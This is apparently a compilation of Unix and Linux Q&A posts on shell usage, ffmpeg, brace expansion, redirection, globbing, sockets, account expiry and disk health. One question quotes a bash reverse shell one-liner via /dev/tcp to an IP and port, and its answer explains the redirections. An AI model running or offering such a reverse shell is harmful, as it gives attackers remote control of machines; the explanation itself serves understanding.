I have a video and I want to extract every 10th frame, as I am getting way too many images with:

ffmpeg -i out1.avi -r 1 -f image2 image-%3d.jpeg

(Related: How to extract images from video file?)
If you want 1/10 of what you have now (when you use -r 1) then use -r 0.1. It will grab 1 frame every 10 seconds instead of 1 frame every second:

ffmpeg -i out1.avi -r 0.1 -f image2 image-%3d.jpeg

EDIT: If you really want every 10th frame from the video then you can use select with modulo 10:

ffmpeg -i out1.mp4 -vf "select=not(mod(n\,10))" -vsync vfr image_%03d.jpg

but it may give more images than before. If the video has 25fps then -r 1 gives an image every 25th frame, and if the video has 60fps it gives an image every 60th frame. So it gives fewer images than this command, which grabs an image every 10th frame.
How to extract every 10th frame from a video?
How can I record and play asciinema screen recordings in a LAN without an internet connection? The tool uploads recordings to the asciinema website by default, but I want to keep them local and run the player on a local webserver.
Just pass asciinema rec a file name as an argument, in which case it will simply save the recording to the local file and not try to upload it to the server. For example:

$ asciinema rec demo.cast

You can then play the recording locally (on the terminal) with:

$ asciinema play demo.cast

And finally upload it with:

$ asciinema upload demo.cast

See the asciinema usage docs for more details on each of these.

You mentioned hosting the recording on your own server. In that case, you might want to look at setting up your own asciinema web app instance, which you need to run on your server in order to host screencasts you upload. That page has a link to the web app install guide (which by default runs in a Docker container). Once you have that up and running, you can configure your local asciinema to upload to your server rather than the public one at asciinema.org.

Alternatively, you can simply host the asciinema player along with the *.cast files on a webserver and embed them directly into an HTML page, which sounds like what you are looking for, as there is no asciinema upload step involved. See these instructions for standalone usage of the asciinema-player app.
How to use asciinema offline?
It is easy to find that ext2 filesystem labels can be set with tune2fs and e2label. GParted GUI offers to give partition labels when creating partitions of any type, but not to change the label of an existing partition. I am only interested in MBR partitions (not GPT) and preferably console tools. In particular, I am using the JFS filesystem. Can I give it a label to be used in /etc/fstab ? Human-readable label, not the GUID?
Compare the description of an MBR partition table entry with the description of a GPT/GUID partition entry. You'll see that while a GPT/GUID partition has dedicated locations for both a "unique partition GUID" and a "partition name", neither is available for MBR. So you just can't do this on MBR; it's available only for GPT.

There's still a unique 32-bit identifier for the whole MBR (at position 0x1B8) that might be usable, along with the partition number. It can be changed using fdisk's expert options:

# fdisk /dev/ram0
[...]
Command (m for help): x
Expert command (m for help): i
Enter the new disk identifier: 0xdf201070
Disk identifier changed from 0xdeadbeaf to 0xdf201070.
Expert command (m for help): r
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

What you should probably use, like tune2fs for ext2, is jfs_tune to label the filesystem. For example:

# jfs_tune -L mylabel /dev/ram0p1
jfs_tune version 1.1.15, 04-Mar-2011
Volume label updated successfully.
# blkid | grep ram0
/dev/ram0: PTUUID="df201070" PTTYPE="dos"
/dev/ram0p1: LABEL="mylabel" UUID="e1805bac-44fb-4f4e-860b-64a1d303400f" TYPE="jfs" PARTUUID="df201070-01"

All "variables" output by blkid are probably usable in /etc/fstab; you should run tests.
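Once the filesystem carries a label, /etc/fstab can refer to it by name instead of by device path. A sketch (the label and mount point here are made-up examples):

```
# /etc/fstab entry using the filesystem label set with jfs_tune -L mylabel
LABEL=mylabel  /mnt/data  jfs  defaults  0  2
```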
How to label a partition in Linux?
I'm doing a project regarding RSSI and I have to retrieve the signal level of a particular WiFi SSID that I'm working on, using the Linux command line. I've made use of the iwlist scanning command but I just couldn't get it to display the values that I want by using grep to print only the SSID name, quality and signal level. Commands that I've tried that didn't give me the results I wanted:

iwlist INTERFACE scanning essid SpecificESSID | grep Signal
iwlist INTERFACE scanning essid SpecificESSID | grep ESSID,Signal
iwlist INTERFACE scan | grep 'ESSID:"SpecificESSID"\|Signal level'

The last one almost worked, but it displayed other networks' signal levels as well and I only need one specific network's information.
First, iwlist is the old command; there's the newer iw command with more features. If the "SSID you are working on" is the access point (AP) you are currently connected to, use

iw wlan0 station dump

pick the value(s) you are interested in (say, average signal strength), and then something like

iw wlan0 station dump | grep 'signal avg:'

For the currently connected AP, you actually have more detailed information than for all APs. If you want signal strength for all visible APs, do something like

iw wlan0 scan | egrep 'SSID|signal'

You can post-process this for SSIDs you are interested in. Say you want SSID1 and SSID2, then you can do

iw wlan0 scan | egrep 'SSID|signal' | egrep -B1 'SSID1|SSID2'

The -B1 displays the line before the match, because in the scanning output, the signal strength comes before the SSID.
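The post-processing step can be sketched with awk so that only the wanted SSID's signal survives. Since a real scan needs root and a live interface, canned output stands in here (the SSID names and levels are invented):

```shell
# Remember the most recent signal line; print it when the SSID matches.
scan='signal: -40.00 dBm
SSID: HomeNet
signal: -71.00 dBm
SSID: CoffeeShop'

printf '%s\n' "$scan" | awk -v want="HomeNet" '
  /signal:/ { sig = $2 " " $3 }
  /SSID:/   { if ($2 == want) print $2, sig }'
```

This relies only on the fact that in scan output the signal line precedes its SSID line, the same ordering the -B1 trick exploits.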
Retrieving specific SSID's Name, Quality and Signal Level using iwlist
Consider these wget commands:

wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/papj.sh
wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/nixta.sh

Is there any elegant way to unite the different endings of the same base URL into one line instead of 2 or more? Pseudocode:

wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/papj.sh||nixta.sh
As wget accepts several URLs at once, this can be done using brace expansion in bash:

wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/{papj.sh,nixta.sh}

or even

wget -P ~/ https://raw.githubusercontent.com/user/repo/branch/{papj,nixta}.sh

but this only works for well-suited names, of course.
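Substituting echo for wget shows exactly what argument list the shell builds before the command ever runs (brace expansion is a bash/ksh/zsh feature, hence the explicit bash here):

```shell
# echo stands in for wget so the expanded argument list is visible
bash -c 'echo https://raw.githubusercontent.com/user/repo/branch/{papj,nixta}.sh'
```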
Uniting urls for a download utility (like wget) in one line
The command echo {1..3}-{1,2} prints 1-1 1-2 2-1 2-2 3-1 3-2. I understand the way those curly braces can be used. But what actually are they? Is it the job of sh / bash to parse/expand them and deliver the expanded version to the executed program? If so, what other tricks can it do and is there a specification? Also, is there a name for it? Is ls *.txt handled in a similar way internally? Is there a way to achieve an n-times repetition of an argument? Like (not working, of course, only a concept): cat test.pdf{*3} ⇒ cat test.pdf test.pdf test.pdf ?
They are called brace expansion. It is one of several expansions done by bash, zsh and ksh, filename expansion (*.txt) being another one of them. Brace expansion is not covered by the POSIX standard and is thus not portable. You can read more about it in the bash manual.

On @Arrow's suggestion: in order to get cat test.pdf test.pdf test.pdf with brace expansion alone, you would have to use this "hack":

#cat test.pdf test.pdf
cat test.pdf{,}
#cat test.pdf test.pdf test.pdf
cat test.pdf{,,}
#cat test.pdf test.pdf test.pdf test.pdf
cat test.pdf{,,,}

Some common uses:

for index in {1..10}; do
    echo "$index"
done

touch test_file_{a..e}.txt

Or another "hack" to print a string 10 times:

printf -- "mystring\n%.0s" {1..10}

Be aware that brace expansion in bash is done before parameter expansion, therefore a common mistake is:

num=10
for index in {1..$num}; do
    echo "$index"
done

(the ksh93 shell copes with this, though)
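That last pitfall can be demonstrated directly, along with a workaround that expands at the right time (a sketch; seq is one option, a C-style for loop in bash being another):

```shell
# {1..$num} is not a valid brace expression at expansion time,
# so it survives as the literal word {1..3}:
bash -c 'num=3; for i in {1..$num}; do echo "$i"; done'

# seq generates the sequence at run time instead:
num=3
for i in $(seq 1 "$num"); do echo "$i"; done
```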
How does curly brace expansion work in the shell?
I'm facing some trouble with the date command. The following execution issues an error:

danilo@desktop:~$ x=$(date -d "+60 seconds"); dt=$(date -d "$x")
date: invalid date ‘Mo 11. Sep 09:07:05 CEST 2017’

This is strange, because it works on other computers I tested. Even this produces an error:

danilo@desktop:~$ x=$(date); dt=$(date -d "$x")
date: invalid date ‘Mo 11. Sep 09:06:43 CEST 2017’

What is the reason for this error? Is it the timezone settings? How can I make it work?
The default output format for your locale is not supported as input to date. The solution is to use some standard format. For example:

x=$(date -d "+60 seconds" +%s); dt=$(date -d "@$x")

+%s tells date to output a standard Unix format: seconds since the epoch. The @ sign in date -d "@$x" tells date to interpret $x as seconds since the epoch.
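A round trip through the epoch format shows the idea (GNU date assumed; the timestamp is an arbitrary example):

```shell
# Parse a date into seconds-since-epoch, then read it back with @
x=$(date -d "2017-09-11 09:07:05" +%s)
dt=$(date -d "@$x" "+%Y-%m-%d %H:%M:%S")
echo "$dt"
```

Because both directions go through the locale-independent epoch count, this works regardless of what LC_TIME is set to.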
Parsing date with the contents of a previous date execution issues error
What's the best way to go to a directory that contains a specific file? (Assuming we are starting at the root of where we wish to search.) I'm using Cygwin.

SOLUTION: My final solution was to put this into my .bashrc file (note the quotes around "$1", so file names with spaces also work):

jump2_func() {
    cd "$(find . -name "$1" -printf %h -quit 2>/dev/null)"
}
alias jump2=jump2_func
cd "$(find . -name filename -printf %h -quit 2>/dev/null)"

If no file with this name is found then cd changes into the home directory. If that is not wanted then you need something like this:

dir="$(find . -name filename -printf %h -quit 2>/dev/null)"
test -d "$dir" && cd "$dir"
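The -printf %h / -quit combination can be tried out safely in a throwaway tree (GNU find assumed, which Cygwin ships; all names here are invented):

```shell
# %h prints the directory part of each match; -quit stops after the first
tmp=$(mktemp -d)
mkdir -p "$tmp/a/b"
touch "$tmp/a/b/target.txt"
dir=$(find "$tmp" -name target.txt -printf %h -quit 2>/dev/null)
echo "$dir"   # the directory holding target.txt
rm -rf "$tmp"
```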
Search for a specific file and change to its directory
I am doing some security research and I was wondering how the following snippet works on Unix-based OSes:

exec 5<>/dev/tcp/192.168.159.150/4444; cat <&5 | while read line; do \$line 2>&5 >&5; echo -n \$(pwd)'# ' >&5; done

I am totally aware of what this code does (i.e. establish a reverse shell to 192.168.159.150 over port 4444) but I don't understand what these sections are doing:

exec 5<>
cat <&5
2>&5 >&5

And in general, how this whole thing fits together to produce the shell that I see. Could anyone help explain this or point me in the right direction to understanding this? Thanks
Some parts of your question are answered here. But briefly:

exec 5<>/dev/tcp/192.168.159.150/4444 opens a new file descriptor with the number 5, for both reading and writing, connected over TCP to IP 192.168.159.150, port 4444. (By the way, 0 is the STDIN, 1 the STDOUT and 2 the STDERR file descriptor.)

cat <&5 reads from file descriptor 5, i.e. echoes whatever information is received over that TCP connection.

2>&5 >&5 sends the STDERR and STDOUT of each executed command to file descriptor 5, i.e. back over the network.
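To watch the exec 5<> mechanics without any networking, a regular file can stand in for /dev/tcp (a sketch; any writable path works):

```shell
# Open fd 5 for reading and writing, write through it, then close it.
f=$(mktemp)
exec 5<>"$f"      # like exec 5<>/dev/tcp/host/port, but backed by a file
echo "hello" >&5  # same direction as the 2>&5 >&5 in the one-liner
exec 5>&-         # close fd 5
cat "$f"
rm -f "$f"
```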
How is this command redirection working?
So basically I want to add these two command lines together:

ls *[Aa]*
ls *[Bb]*

I'm looking for a file that contains both A and B (lower or uppercase) and they can appear more than once. Here's what I tried:

ls *[Aa]*&&*[Bb]*
Using brace expansion

One method is to use brace expansion. Let's consider a directory with these files:

$ ls
1a2a3  1a2b3  1b2A3  1b2b3

To select the ones that have both a and b in either case:

$ ls *{[bB]*[aA],[aA]*[bB]}*
1a2b3  1b2A3

Improvement

A possible issue is how brace expansion behaves if one of the options has no matching files. Consider a directory with these files:

$ ls
1a2a3  1b2A3  1b2b3

Now, let's run our command:

$ ls *{[bB]*[aA],[aA]*[bB]}*
ls: cannot access '*[aA]*[bB]*': No such file or directory
1b2A3

If we don't like that warning message, we can set nullglob and it will go away:

$ shopt -s nullglob
$ ls *{[bB]*[aA],[aA]*[bB]}*
1b2A3

A limitation of this approach, though, is that if neither glob matches, then ls is run with no arguments and consequently it will list all files.

Using extended globs

Let's again consider a directory with these files:

$ ls
1a2a3  1a2b3  1b2A3  1b2b3

Now, let's set extglob:

$ shopt -s extglob

And, let's use an extended glob to find our files:

$ ls *@([bB]*[aA]|[aA]*[bB])*
1a2b3  1b2A3
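The extended-glob variant can be reproduced end to end in a scratch directory (a sketch; extglob is bash-specific, so the demo runs explicitly under bash):

```shell
# Create the sample files and match those containing both a/A and b/B.
# shopt must take effect before the pattern is parsed, hence its own line.
bash -c '
shopt -s extglob
cd "$(mktemp -d)"
touch 1a2a3 1a2b3 1b2A3 1b2b3
printf "%s\n" *@([bB]*[aA]|[aA]*[bB])*
'
```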
File Globbing: adding *[Aa]* & *[Bb]* together [duplicate]
Is there an equation solver for the shell? For example, I enter input 1000=x^(1.02) and the shell solves for x.
Wolfram Mathematica has a command-line interface, so you can use it from the shell, but it is expensive.
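For a one-off equation like this one, though, no solver is needed: 1000 = x^1.02 rearranges to x = 1000^(1/1.02) = e^(ln 1000 / 1.02), which plain awk (or bc -l) can evaluate from the shell:

```shell
# Closed-form solution of 1000 = x^1.02, to one decimal place
awk 'BEGIN { printf "%.1f\n", exp(log(1000)/1.02) }'
```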
Equation solver for the shell?
I have the following text in the data.txt file:

:MENU1
0. public
1. admin
2. webmail

:SYNTAX
! opt1, ... :
:

:ERROR1
Error #1, blah... blah.. blah...
Please do ...

:ERROR2
Error #2 ...

and I want to use a regular expression (Perl syntax) to extract the part from :MENU1 to the next first ":", but dropping MENU1 and the last ":" from the result. I've been trying several regexes, but in the closest solution I got I can't make the 'greedy' option work and can't discard the last ":":

grep -Poz "^:MENU1\K[\w\W]*:"

This works with grep, but brings all the text until the last ":". I want only up to the next first ":" after :MENU1:

0. public
1. admin
2. webmail

(note the final blank line)
The pattern *: will match everything until the last :. To stop at the next : you need *?:. E.g.:

% grep -Poz '^:MENU1\K[\w\W]*?:' data.txt

0. public
1. admin
2. webmail

:

You can strip the first line by matching the newline before your \K. E.g.:

% grep -Poz '^:MENU1\n\K[\w\W]*?:' data.txt
0. public
1. admin
2. webmail

:

To eat the empty line and the : you can match and discard that text. E.g.:

% grep -Poz '^:MENU1\n\K[\w\W]*?(?=\n+:)' data.txt
0. public
1. admin
2. webmail

Next we can simplify your character class, to match anything but ::

% grep -Poz '^:MENU1\n\K[^:]*?(?=\n+:)' data.txt
0. public
1. admin
2. webmail

And finally we can rewrite the initial part of the match:

% grep -Poz '(?<=:MENU1\n)[^:]*?(?=\n+:)' data.txt
0. public
1. admin
2. webmail

This is similar to what @terdon came up with, but this takes care of the blank lines without another call to grep. This final regex makes use of look-around assertions. The (?<=pattern) is a look-behind assertion that lets you match the pattern but not include it as part of the output. The (?=pattern) is a look-ahead assertion that lets us match on the trailing pattern without including it in the output.
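The final command can be reproduced end to end by recreating a minimal data.txt (GNU grep built with PCRE support, i.e. the -P flag, is assumed):

```shell
# tr strips the NUL terminator that -z appends to each output record
f=$(mktemp)
printf ':MENU1\n0. public\n1. admin\n2. webmail\n\n:SYNTAX\n! opt1, ... :\n' > "$f"
grep -Poz '(?<=:MENU1\n)[^:]*?(?=\n+:)' "$f" | tr -d '\0'
rm -f "$f"
```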
grep regular expression solution (greedy not working)
I might be mistaken here, but I was watching someone navigate using the cd command, and without actually executing it, they were able to show the folder contents of the current folder. So if I type cd Downloads/Stuff then, without pressing enter, can I list the content of the Download/Stuff folder?
It's the programmable completion feature of the shell. You can simply press the TAB key twice to gain this behavior. Imagine you type cd Downloads/St and then press the TAB key. St will be completed to Stuff if it is the only folder starting with St. If there are other folders starting with St in there, you will get a list of them by pressing TAB twice. For example:

$ cd Downloads/St<tab><tab>
Stuff/   Stage/   Start/

Another example: when you type cd Downloads/ and then press the TAB key twice, everything you can cd to will be listed:

$ cd Downloads/<tab><tab>
Stuff/   Stage/   Start/   Otherfolder/
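Under the hood this is bash's completion machinery, which is also exposed through the compgen builtin; a quick sketch in a throwaway directory (the folder names are invented):

```shell
# -d asks for directory-name completions matching the prefix "St";
# sort just makes the output order stable. compgen is a bash builtin.
bash -c '
cd "$(mktemp -d)"
mkdir Stuff Stage Start Otherfolder
compgen -d -- St | sort
'
```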
Listing folder contents during cd command
I'm writing a simple desktop initiation script which waits for disk idle, and then launches the next external program (like Firefox, Skype or conky) using &, like:

ps cax | grep conky > /dev/null
if [ $? -eq 0 ]; then
    echo "Conky is already running."
else
    wait-for-disk-idle sda
    conky &
fi

That's easy. The problem is that some programs spew a lot of debug output to the terminal, which gets mixed with the messages produced by my initialization script.

The question: Is there any way to asynchronously launch an external program so that its standard output is discarded?

What I already tried:

conky & >/dev/null 2>/dev/null
bash -c conky &

The correct answer:

bash -c "conky >/dev/null 2>/dev/null &"
You probably want to discard any STDERR output as well. You can do both like so:

conky > /dev/null 2>&1 &

This statement essentially tells the shell to do the following:

conky > /dev/null - redirect all standard output to /dev/null.
2>&1 - redirect standard error to where standard output is currently pointing. Because of the previous redirect, your standard output is pointing to /dev/null, so standard error will follow.
& - run this in a sub-shell (background).

Thanks to @alexis for pointing out that my description of & wasn't quite precise: (a) every external command must be run after a (v)fork, not just background processes; (b) backgrounded processes are not run in a sub-shell, but executed immediately after the fork. The real difference when a process is backgrounded is that the invoking shell doesn't immediately wait(2) for it (but prints a prompt and awaits user input).

When redirecting output, Bash reads the redirects in order, from left to right. Bash also treats '&' as a command separator, which can be used anywhere ';' would normally be used. So what you were doing was telling bash:

Run conky in the background, asynchronously, and return control of the terminal to the user.
Bash considers what follows the & a new command - this is the same as running >/dev/null at the prompt with nothing preceding the redirect. Nothing happens.
Redirect the standard error of that nonexistent command to /dev/null.
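The left-to-right rule is easy to verify by flipping the order of the two redirects (a sketch, using sh -c to produce one line on each stream):

```shell
# 2>&1 first: stderr is pointed at the *current* stdout, and only then
# is stdout itself sent to /dev/null -- so only stderr survives.
only_stderr=$(sh -c 'echo out; echo err >&2' 2>&1 >/dev/null)
echo "captured: $only_stderr"

# For the question's goal, discard both streams and background the job:
sh -c 'echo out; echo err >&2' > /dev/null 2>&1 &
wait
```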
How to asynchronously launch external program from cli and discard its output?
When typing a complicated command that started on the command line in Bash, how do I switch to editing it with ViM?
There is a readline command, called edit-and-execute-command tied to the sequence C-x C-e, that invokes your editor with the current content of the command line for editing. When you exit the editor the command is executed.
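The editor C-x C-e invokes is taken from the VISUAL or EDITOR environment variables (typically falling back to emacs if neither is set), so to get vim you can put something like this in your ~/.bashrc:

```shell
# Make C-x C-e (and other tools honoring these variables) open vim
export VISUAL=vim
export EDITOR=vim
```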
How to switch to editing command in text editor [duplicate]
I'm using this command to recursively generate a SHA-512 hash for each file in a directory hierarchy:

find . -type f -exec openssl sha512 {} \;

I'd like to sort the files in lexicographical order before generating the hashes. I can use sort like this:

find . -type f | sort

but I'm not sure how to then pipe the sorted file list into openssl. I tried this:

find . -type f | sort | openssl sha512

but this generates a single hash of the entire output of sort, whereas I want a hash for each individual file. Some versions of find include an -s option ("Cause find to traverse the file hierarchies in lexicographical order"), but this isn't available in my version of find. Many thanks in advance for your help!
You can use xargs to get what you want:

find . -type f -print0 | sort -z | xargs -0 -n1 openssl sha512

The -n1 option tells xargs to only allow one argument to be given to the openssl command. The -print0, -z and -0 options prevent the pipeline from breaking if there are "problem" characters (like an embedded newline) in the filenames.
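The pipeline can be exercised in a scratch directory; sha256sum stands in for openssl sha512 here purely to keep the demo dependency-free — the structure is identical:

```shell
# Two files created in reverse order; sort -z guarantees a.txt hashes first
tmp=$(mktemp -d)
cd "$tmp"
printf 'x\n' > b.txt
printf 'y\n' > a.txt
find . -type f -print0 | sort -z | xargs -0 -n1 sha256sum
```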
Sort the output of find before piping to openssl
-bash-3.00$ ./p4 -V
-bash: ./p4: Invalid argument

What does "Invalid argument" mean in Unix? More details:

p4 is an executable in the current directory.
p4 actually refers to Perforce.
The option -V is supposed to display the version details.
Solaris 10 is the OS.
p4 has executable permissions (chmod +x p4).

The official documentation wasn't very helpful in my case.
I figured it out! I was running an x86 binary on a SPARC machine. Similar question on SO On Solaris, when you try running a SPARC binary on an x86 platform (or vice versa), Invalid argument is the error you get.
What does "Invalid argument" mean in Solaris?
I tried to understand the usage of xargs and did the following experiment:

ls | xargs | touch

I want to refresh the dates of the files and directories in the current directory. Though it is a bit silly, as I could use a simpler form to achieve the same effect. In my mind, xargs reads from STDIN and turns it into arguments for the other command (/bin/echo by default if no command is specified). Am I misunderstanding something? It failed and I am wondering why.
It needs to be like this:

ls | xargs touch

The xargs command runs the touch command with a number of strings read from stdin. In your case, stdin for xargs is the output end of the pipe from ls. The way you had the command:

ls | xargs | touch

xargs had no command to run against the strings (filenames) it would read from stdin. In that case, xargs simply prints each file name, and touch gets the list of file names on its standard input. But touch doesn't read from its standard input, and since you didn't give it any arguments, it should have printed an error message like:

touch: missing file operand
Try `touch --help' for more information.

(which you should have mentioned in your question).
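The corrected form is easy to check in a scratch directory (the file names are invented):

```shell
# xargs reads the two names from the pipe and hands them to touch
tmp=$(mktemp -d)
cd "$tmp"
printf 'a\nb\n' | xargs touch
ls
```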
Why did using xargs fail in this case?
I am using Ubuntu 10.04. I know I can start NVIDIA X Server Settings by choosing System -> Preferences -> Monitors on the top bar. But how can I start the NVIDIA X Server Settings window by running a command from the terminal? What is that command?
I guess it is: nvidia-settings
How to start nvidia x server settings from command line?
I'm trying to install some software from the command line. There is a file called "config.sub". Am I supposed to use this for something? I haven't been able yet to find out by searching online what this file is supposed to do. I think part of the deal is I don't know how to ask the question correctly.
config.sub is one of the helper scripts used by Autoconf-generated build systems. The Autoconf documentation states that it converts system aliases into full canonical names. In short - you don't have to worry about it unless you're an autoconf developer.
What is the function/point of "config.sub"
clear clears the screen of the terminal. Is there any command that can restore the original screen contents from before clear was run, effectively undoing that clear?
If you mean undo, then there is ★nothing. Except, you can go through the command history and re-run a command. If the command is idempotent, then you will get the same result. Footnotes: ★ nothing unless you use some sort of logging system. This logging may be part of a terminal program, or separate. It is not part of the kernel called Linux.
How can we undo the clear command in Linux?
While researching more in-depth information about Bash subshells, I ran into an interesting execution that I would like to understand why it works. The execution involves assigning a string to a variable that is then used when man is called, link to original example. I have already read about why the specific variable LESS is used in that example (man has less as its default pager in many distros), what I do not understand is how a variable assignment followed by a command execution works without any kind of separating metacharacters. LESS=+/'OPTIONS' man man opens the man page for the man command directly under the OPTIONS section. It works with files opened directly with less too (which leads me to believe that the LESS variable is used by less the same way as doing a regex search within a less "session"). The LESS variable is not being exported, it's never saved in the current shell environment (executing echo $LESS returns nothing) so how is less capturing that value? Why does that work, but not something like foo='hello' echo $foo? This case only works when a command separator (;) is included between the variable assignment and the command execution. I even tried foo=+'hello' echo $foo in case =+ did something I was not aware in Bash, but no changes in the output. Any explanations or reading material are welcome!
This is a standard feature. You can set the variable when launching the command and then the variable will be set for the command. It also works in the example you show, foo='hello' echo $foo. The problem is that you are testing it the wrong way. When you run this:

foo='hello' echo $foo

the shell will expand the variable before running the command. Since foo is not actually set in the current shell when you launch it, that becomes just echo (echo nothing). You can see this with set -x:

$ set -x
$ foo='hello' echo $foo
+ foo=hello
+ echo

Now, compare that to what happens if you instead use a little script so that the variable is not seen by your shell:

$ cat ~/scripts/foo.sh
+ cat /home/terdon/scripts/foo.sh
#!/bin/bash
echo "The value of foo is:$foo"

Use that to echo the variable and you get:

$ foo='hello' ~/scripts/foo.sh
+ foo=hello
+ /home/terdon/scripts/foo.sh
The value of foo is:hello

You can do the same thing if you call bash -c and enclose the command you give it in single quotes, so the variable will be protected and not expanded by your current shell before calling bash -c:

$ foo='hello' bash -c 'echo $foo'
hello

While this fails, because the double quotes mean that $foo is expanded before bash -c ever sees it:

$ foo='hello' bash -c "echo $foo"
$

The behavior is documented in man bash, in the "ENVIRONMENT" section:

The environment for any simple command or function may be augmented temporarily by prefixing it with parameter assignments, as described above in PARAMETERS. These assignment statements affect only the environment seen by that command.

It's also described in detail in the manual: 3.7.1 Simple Command Expansion
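The contrast can be compressed into two lines, with sh -c playing the role of the helper script:

```shell
# The child process sees foo in its environment...
foo=hello sh -c 'echo "child sees: $foo"'

# ...but the parent shell expands the unquoted $foo (still unset) first
unset foo
foo=hello echo "parent expanded: $foo"
```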
Command-line variable assignment and command execution
Is there a command or system call for listing all the abstract unix sockets currently open? Update: It was suggested that I use netstat -x, which theoretically works, but does not list the names of the abstract sockets, only those with paths. bash-5.0$ netstat -xeW Active UNIX domain sockets (w/o servers) Proto RefCnt Flags Type State I-Node Path unix 2 [ ] STREAM CONNECTED 3959158 unix 2 [ ] STREAM CONNECTED 3961068 unix 3 [ ] STREAM CONNECTED 3965008 unix 3 [ ] STREAM CONNECTED 3967192 /run/spire/writable/agent.sock
Abstract sockets

Their name begins with a NUL byte in sun_path; the remaining 107 bytes can hold a unique identifier, which other programs can use to connect. They are not represented in the file system.

Most Unix systems come with the lsof (list open files) command; if not, you can easily add it. lsof -U lists unix domain sockets:

upowerd 1604 root 5u unix 0xffff88005af5f400 0t0 18631 type=STREAM
colord 1614 colord 10u unix 0xffff880034d3f400 0t0 18170 type=STREAM
systemd 2009 root 13u unix 0xffff88005a293000 0t0 21213 /run/user/0/systemd/notify type=DGRAM
systemd 2009 root 14u unix 0xffff88005a293c00 0t0 21214 /run/user/0/systemd/private type=STREAM

On Linux, when showing abstract namespace paths, null bytes are converted to @ (older tool versions may not handle the zero bytes properly):

upstart 1525 lightdm 7u unix 0xffff880034b99800 0t0 17301 @/com/ubuntu/upstart-session/111/1525 type=STREAM

With this you'll be able to list all the unix domain sockets on your system. The ss command can also show sockets, and abstract sockets will again be prefixed with @.

Good luck!
Is there a command to list all abstract unix sockets currently open?
After a command like: $ usermod -e <yesterday> -f <tomorrow> bea Bea's account will be expired, but still active (until tomorrow). What's the difference? What could happen yesterday and can't happen today? And what can happen today but not after tomorrow?
usermod -e normally takes a date as a parameter: if you specify usermod -e 2019-12-31 joeuser, then Joe User's account will only work until the end of the year, and no more, unless an administrator re-enables the account, either by setting a new account expiration date, or by using usermod -e "" joeuser to allow the account to be enabled indefinitely with no scheduled expiration time. You can also use usermod -e 1 joeuser to disable the account immediately: this will effectively set the account to expire on Jan 2, 1970 which is firmly in the past. Disabling an account like this works for all authentication mechanisms: even if the user uses SSH keys, smart card, RSA SecurID or any other authentication mechanism, that account will not accept logins. When the account is disabled like this, there is nothing the user can do alone to re-enable it: the only recourse is to contact a system administrator. Note that this account expiration is completely separate from password expiration. usermod -f, on the other hand, expects as a parameter a number of days. This is a clock that starts ticking when the user's password expires: for example, if you set Joe User's password to expire in 90 days (passwd -x 90 joeuser) and usermod -f 14 joeuser, then once it has been 90 days from the last time Joe User changed his password, Joe will have exactly 14 days of time when the system will force him to change his password if he attempts to log in. If he does that, the new password will again be valid for 90 days. If Joe won't log in within those 14 days, the account will be locked and Joe will need to contact an administrator to unlock it if he needs to access the system still. Note that historically passwd -l used to mean locking the account; with the modern Linux PAM implementation, it actually means locking the password only. If the account has SSH keys or some other authentication methods configured, they will still be allowed even after a passwd -l. 
The current recommended way to completely disable an account without removing it or changing its configuration (so that it can be re-enabled exactly as it used to be, if desired) is usermod -e 1 <username>. This is guaranteed to be equally effective with both new and old PAM implementations. Changing the user's shell to /bin/false or to a command that displays a message and then exits, will also work to disable command-line login for any authentication method, but as a side effect, the information about the user's current shell will be lost. Also, if the system has other services like email or FTP that use the system passwords for authentication, changing the shell may not disable access to them.
Difference between expired account and inactive account
I tried using this command to compute number of lines changed between two files: diff -U 0 file1 file2 | grep ^@ | wc -l My problem with this command is that if one file has only one line, and the other file has 100 lines, the output is still just 1. What command would give me the total number of lines changed, including the total extra lines in one file?
Looking for lines starting with @ gives you the number of blocks of changes that diff found. They would often be more than one line. As it happens, there's a tool to count the statistics of a diff: diffstat (web site, man page). Count insertions and deletions: $ diff -u test1 test2 | diffstat test2 | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) Combine insertions and deletions in the same block to just single "modification" operations: $ diff -u test1 test2 | diffstat -m test2 | 2 -! 1 file changed, 1 deletion(-), 1 modification(!) Also, you could use diffstat -t to get a tabular output of just the numbers of modified lines. The test files: $ cat test1 a b c d $ cat test2 a x d
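If diffstat isn't at hand, a rough total of changed lines (insertions plus deletions) can be pulled from plain diff output, which marks removed lines with < and added lines with > (a sketch using the same test files):

```shell
# Recreate the answer's test1/test2 and count every added or removed line
tmp=$(mktemp -d)
printf 'a\nb\nc\nd\n' > "$tmp/test1"
printf 'a\nx\nd\n'    > "$tmp/test2"
diff "$tmp/test1" "$tmp/test2" | grep -c '^[<>]'
```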
Given two files, how do I find the total number of line changes?
I have seen separate answers for all the little pieces of my question, I looked really hard, but it still doesn't seem to make any sense. A little history of how this happened. Yesterday by using randomly using ls in my root directory as root, I discover a file called dead.letter. Said file contains warnings that seem pretty ominous: Device: /dev/sda [SAT], 8 Currently unreadable (pending) sectors Device: /dev/sda [SAT], 8 Offline uncorrectable sectors Those two warnings repeat for a final file size of 53346 (bytes, I guess? This is what the ls command said). I check online, search engines inform me that my hard drive is dying. OK, good, I know what's going on. Except that I checked my hard drive's health two weeks ago and it was fine, and when I check it now through smartctl -H /dev/sda it tells me overall health is good. Even weirder, why is it in a dead.letter file? From what I understand it's a file that happens when you abort a mail you're currently writing, so wtf? The dead.letter file, says the stat command, has not been modified since January 18th. Was this a one-time event? So here's my question: is my hard drive fine or is it dying in a really sneaky way? I have no idea what's going on. I run a Fedora 24/Gnome Shell on a 2012 Asus U36SG. Filesystem is all ext4 on LVM2… I think. I hope this is enough information!
The dead.letter file is created by mail clients when they cannot send email. It's likely you don't have any mail subsystem installed on your machine. The date of the file corresponds to the date the mail was attempted. On 18th January it looks like smartctl tried to warn you of 8 sectors that couldn't be read. This is a warning sign that the disk may be dying but it's not a definite marker. I'd start saving for a replacement, though. You confirmed that the disk has been more recently checked and was reported to be fine. What's happened here is that you wrote new data to those sectors, the disk failed to write them, and silently remapped them to dedicated spare sectors elsewhere on the disk. There are now no outstanding faulty sectors. As the disk gets older and more sectors need remapping, eventually the spares will get filled up and real data will be lost. It's just a matter of time. Ensure you have got backups - or that you can afford to lose any or all of your data either in one big go or subtly so you don't really notice the corruption at first.
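To keep an eye on how far the remapping has progressed, you can query the SMART attributes directly with smartctl -A (the attribute names matched below are the usual smartmontools ones; exact names vary by drive, so treat this as a sketch):

```
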